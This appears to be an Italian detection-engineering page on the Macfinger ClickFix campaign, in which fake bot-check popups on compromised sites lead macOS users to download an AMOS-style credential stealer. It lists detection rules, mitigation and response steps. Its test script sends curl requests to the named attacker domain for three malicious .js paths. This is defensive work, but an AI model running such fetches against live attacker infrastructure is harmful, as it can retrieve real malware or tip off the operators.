Campagna Macfinger ClickFix
Detection stack
- AIDR
- Alert
- ETL
- Query
Riassunto
Una nuova campagna di ingegneria sociale tracciata come Macfinger ClickFix prende di mira utenti macOS iniettando script dannosi in siti web legittimi. L’attacco presenta pagine di protezione bot false che ingannano le vittime facendole eseguire comandi che scaricano malware specifico per macOS. Il payload sembra essere una variante del ladro macOS Atomic (AMOS) progettato per rubare credenziali e altre informazioni dell’utente.
Indagine
L’indagine ha identificato siti web legittimi compromessi con script iniettati che mostrano pop-up di verifica falsi. L’analisi del traffico di rete ha rivelato un dominio dedicato utilizzato per il tracciamento degli utenti, insieme a diversi indirizzi IP che supportano la consegna di malware e le comunicazioni di Comando e Controllo (C2). I modelli di traffico osservati indicano esfiltrazione di credenziali e informazioni di sistema tramite richieste HTTP POST.
Mitigazione
Gli utenti dovrebbero essere addestrati a evitare di seguire istruzioni presentate da pop-up del browser inaspettati o pagine di verifica bot false. Le organizzazioni dovrebbero implementare il filtraggio web per bloccare domini e indirizzi IP noti come dannosi associati alle campagne ClickFix. Si raccomanda anche di monitorare connessioni in uscita insolite verso indirizzi IP non attendibili su porte non standard.
Risposta
Se viene rilevata un’attività di Macfinger ClickFix, gli host macOS interessati dovrebbero essere isolati immediatamente per fermare ulteriore esfiltrazione di dati. I responsabili dovrebbero eseguire un’indagine forense completa per determinare l’entità del compromesso delle credenziali. Le credenziali potenzialmente esposte dovrebbero essere reimpostate e i sistemi dovrebbero essere controllati per individuare meccanismi di persistenza come script shell non autorizzati o binari Mach-O.
Flusso di attacco
Stiamo ancora aggiornando questa parte.
Rilevamenti
Possibile tentativo di comunicazione di ricerca dominio IP (via dns)
Comando e controllo sospetto tramite richiesta DNS di dominio di primo livello insolito (TLD) (via dns)
Possibile tentativo di enumerazione System_profiler (via process_creation)
Possibile manipolazione di stringhe codificate Base64 [MacOS] (via cmdline)
Tentativo di esecuzione Curl sospetto [MacOS] (via cmdline)
Indicatori di compromissione (HashSha256) per rilevare: campagna Macfinger ClickFix
Indicatori di compromissione (SourceIP) per rilevare: campagna Macfinger ClickFix
Indicatori di compromissione (DestinationIP) per rilevare: campagna Macfinger ClickFix
Rileva traffico di campagna Macfinger ClickFix [Firewall]
Rileva l’iniezione di script Macfinger ClickFix [Webserver]
Esecuzione della simulazione
-
Narrativa dell’attacco e comandi: Un avversario utilizza una tecnica di ingegneria sociale conosciuta come “ClickFix,” dove un utente è invitato a cliccare su un pulsante (spesso un falso “fix” o “update”) che esegue uno script dannoso. In questa simulazione, imitiamo la fase finale: il browser/agente lato client che fa una richiesta al dominio controllato da Macfinger
velvet-otter-glagceis.lifeper recuperare un.jsfile dannoso. Questa richiesta è progettata per corrispondere a uno dei tre criteri di selezione specifici nella logica di rilevamento. -
Script di test di regressione:
#!/bin/bash # Script di simulazione per attivare la regola di rilevamento Macfinger ClickFix echo "[*] Avvio simulazione Macfinger ClickFix..." # Obiettivo 1: selezione1 (parametro sito) echo "[*] Simulazione richiesta a selezione1..." curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.js?site=test_payload" # Obiettivo 2: selezione2 (file hash specifico) echo "[*] Simulazione richiesta a selezione2..." curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.4b1009ff6c3f.js" # Obiettivo 3: selezione3 (file ext-b) echo "[*] Simulazione richiesta a selezione3..." curl -s -o /dev/null "http://velvet-otter-glagceis.life/ext-b.4f9db6afad06a.js" echo "[+] Simulazione completata. Controllare il SIEM per gli allarmi." -
Comandi di ripristino:
# Nessuna pulizia locale richiesta poiché si tratta di richieste di rete in uscita. # Se sono stati creati file locali, rimuoverli: rm -f /tmp/macfinger_test_*